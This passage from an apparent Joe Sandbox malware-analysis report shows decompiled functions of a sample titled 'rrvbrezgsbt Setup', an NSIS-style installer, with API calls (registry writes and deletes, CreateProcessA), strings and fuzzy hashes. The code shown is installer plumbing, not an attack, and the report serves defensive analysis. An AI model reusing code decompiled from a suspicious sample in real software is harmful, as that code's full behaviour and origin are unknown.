					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32 ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

unpacking data: %d%%, xrefs: 00402B6A, 00402B7A
verifying installer: %d%%, xrefs: 00402B71

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x0040231c
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp
API String ID: 1356686001-3552877417
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(0003E9C5,00000064,00041253), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a38
0x00402a49
0x00402a51
0x00402a79
0x00402a60
0x00402a63
0x00402ab3
0x00402ab9
0x00402abb
0x00000000
0x00402abb
0x00402a70
0x00402a75
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac3
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad7
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 00403897, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x80f8a0
					_t1 = _t15 + 0x64; // 0xce
					_t16 =  *_t1;
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t4 =  &(_t18[5]); // -4341256
					_t23 = _t4;
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "rrvbrezgsbt Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x3
						_t27 =  *0x423ec8; // 0x80fa4c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x80fa64
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038b5
0x004038bb
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x0040394d
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,rrvbrezgsbt Setup), ref: 0040392F

Strings

rrvbrezgsbt Setup, xrefs: 0040391E
1033, xrefs: 0040389B, 004038A5, 00403916
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\$rrvbrezgsbt Setup
API String ID: 530164218-3565579134
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

Error launching installer, xrefs: 004052F8
C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-2984075973
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
